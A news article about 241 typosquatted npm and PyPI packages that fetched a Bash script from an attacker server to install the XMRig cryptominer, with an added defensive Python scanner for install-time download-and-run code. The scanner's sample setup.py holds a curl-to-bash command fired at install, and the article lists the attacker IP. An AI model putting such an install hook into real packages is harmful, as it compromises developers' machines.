Posted on August 21, 2022 at 11:08 AM
Security researchers have discovered no fewer than 241 malicious npm and PyPI packages that infect Linux machines and drop cryptominers on them.
According to the report, the packages are typosquats of very common open-source libraries and commands such as AIOHTTP, argparse, and React. Once installed, they download a Bash script from the attacker's server and run it to install cryptomining software.
PyPI is a repository of more than 350,000 open-source software packages that millions of registered users install into their Python projects, which lets them build complex products with ease. Malware authors take advantage of the open nature of the repository, where anyone can publish, to upload fake or malicious packages that compromise developers' systems.
33 Projects Launched Cryptominer XMRig
Researcher and software developer Hauke Lubbers stated that about 33 projects on PyPI all launched the open-source Monero cryptominer XMRig after infecting a device. As he was about to report the 33 malicious projects to the PyPI admins, he discovered that the attackers had started publishing another set of 22 packages carrying the same malicious payload.
“After I reported them to PyPI, they were quickly deleted,” Lubbers said. He added that the malicious actor was still trying to upload more packages and went on to publish 22 more of them.
The threat actors used the packages to target Linux systems, installing the XMRig crypto mining software in the process.
The Python packages contain code that downloads the Bash script from the attacker's server through a Bit.ly URL shortener link. The security researcher explained that the shortened link redirected to http://80.78.25[.]140:8000/.cmc, from where the Bash script was fetched.
Once executed, the script reports the IP address of the compromised host back to the attacker, along with whether the cryptominer was deployed successfully.
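The install-time behaviour described above (package code that pulls a Bash script through a URL shortener and hands it to a shell) is something a registry or a CI pipeline can look for statically before anything runs. The scanner below is an added example written for this page, not code from the researcher or from the malicious packages. It walks the AST of a setup.py-style file and flags shell execution, network fetches, URL-shortener hosts, curl-or-wget-piped-to-shell strings, and the two indicators the article gives (the 80.78.25[.]140 host and the /.cmc path, written undefanged so matching works). The two sample setup.py strings are constructed for the example; the short link in them is made up, and the shortener list beyond bit.ly is an assumption.

```python
from __future__ import annotations

import ast
import re
from dataclasses import dataclass

# Indicators from the report: a Bit.ly short link redirecting to
# http://80.78.25[.]140:8000/.cmc (IP written undefanged here so string
# matching works). The other shortener hosts are an assumed illustrative list.
URL_SHORTENERS = {"bit.ly", "tinyurl.com", "goo.gl", "is.gd", "cutt.ly"}
KNOWN_IOCS = ("80.78.25.140", "/.cmc")
# Calls that hand a string to a shell or pull content off the network at install time.
SHELL_CALLS = {"os.system", "os.popen", "subprocess.run", "subprocess.call",
               "subprocess.Popen", "subprocess.check_output", "subprocess.check_call"}
FETCH_CALLS = {"urllib.request.urlopen", "urllib.request.urlretrieve", "requests.get"}
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b")
URL_HOST = re.compile(r"https?://([^/\s:]+)")


@dataclass(frozen=True)
class Finding:
    lineno: int
    rule: str
    detail: str


def _call_name(func: ast.expr) -> str | None:
    """Render a call target as a dotted name (subprocess.run, os.system, ...)."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
        return ".".join(reversed(parts))
    return None


def scan_install_code(source: str) -> list[Finding]:
    """Statically scan setup.py-style code for download-and-run behaviour."""
    findings: list[Finding] = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _call_name(node.func)
            if name in SHELL_CALLS:
                findings.append(Finding(node.lineno, "shell-exec", name))
            elif name in FETCH_CALLS:
                findings.append(Finding(node.lineno, "remote-fetch", name))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            text = node.value
            for host in URL_HOST.findall(text):
                if host.lower() in URL_SHORTENERS:
                    findings.append(Finding(node.lineno, "url-shortener", host))
            for ioc in KNOWN_IOCS:
                if ioc in text:
                    findings.append(Finding(node.lineno, "known-ioc", ioc))
            if PIPE_TO_SHELL.search(text):
                findings.append(Finding(node.lineno, "pipe-to-shell", text))
    return findings


def triggered_rules(source: str) -> set[str]:
    """The set of rule names a piece of install code trips (empty means clean)."""
    return {f.rule for f in scan_install_code(source)}


# Constructed sample in the shape the article describes (a shortener link piped
# to bash from setup.py). It is not the real package code; the link is made up.
SUSPICIOUS_SETUP = """\
import os
from setuptools import setup
os.system("curl -sL https://bit.ly/example-short-link | bash")
setup(name="aiohtttp", version="0.0.1")
"""

# Constructed benign setup.py for comparison.
BENIGN_SETUP = """\
from setuptools import setup
setup(name="mytool", version="1.0", install_requires=["aiohttp>=3.8"])
"""

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        print(label, sorted(triggered_rules(src)))
        for f in scan_install_code(src):
            print(f"  line {f.lineno}: {f.rule}: {f.detail}")
```

The AST walk is deliberately shallow: it does not follow imports, decode base64 blobs or resolve the short link, so an attacker who builds the URL at runtime slips past it. That is the usual trade-off for a registry-side pre-screen: it is cheap enough to run on every upload and catches the plain download-and-run pattern, while anything it flags still goes to a human or a sandbox.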
The IP Address Has Been Taken Down
According to BleepingComputer, which communicated directly with the researcher, the IP address had already been taken down at the time of the report. The researcher's findings were confirmed, however, from copies of the scripts he provided.
Lubbers said he discovered the packages through a small side project of his called Package Observatory Club, which queries and stores metadata on packages uploaded to RubyGems.org and PyPI and runs a set of heuristics over them. When a package trips one of those heuristics, the project alerts the researcher to look into it more closely.
One such heuristic flags package names that closely resemble those of popular packages and standard-library modules, which indicates a potential typosquat. False positives are common, but last week the amount of typosquatting on PyPI was unprecedented.
The researcher noted that he took on the work and made this discovery because the infosec community gains a lot from the open-source software ecosystem, and he wanted to give something back. He added that he will continue to contribute directly by reporting such packages and helping to protect servers from malicious actors. It should be noted, however, that much of the work on the package-repository side is carried out by very few volunteers.
Lubbers noted that the Sonatype security research team he is part of uncovered another 186 npm typosquatting packages that contact the same type of URL to download the malicious Bash script. The team continues to work together to discover more packages that could be used to exploit vulnerable servers.
More Threat Actors Target Servers To Steal Cryptocurrencies
It appears the registries removed the typosquats from their platforms promptly, before they could do much harm to developers.
There have been several security updates and enhancements over the past few years. New measures, such as improvements to Python's setup tools and mandatory two-factor authentication for critical projects, have been introduced to make it harder for attackers to take over accounts and reach developers' systems. However, the fight against threat actors gets more challenging every day.
Last week, software security firm Checkmarx said it discovered a handful of malicious Python packages that are used to carry out DDoS attacks on Counter-Strike servers.
Earlier this month, cybersecurity firm CheckPoint uncovered 10 malicious PyPI packages that were stealing developers' credentials.
The packages infected developers' systems with password-stealing malware. They used typosquatting to impersonate popular software projects and trick PyPI users into downloading them.
In the same month, another cybersecurity firm, ReversingLabs, exposed a supply chain attack dubbed IconBurst, which also relied on typosquatting to infect developers.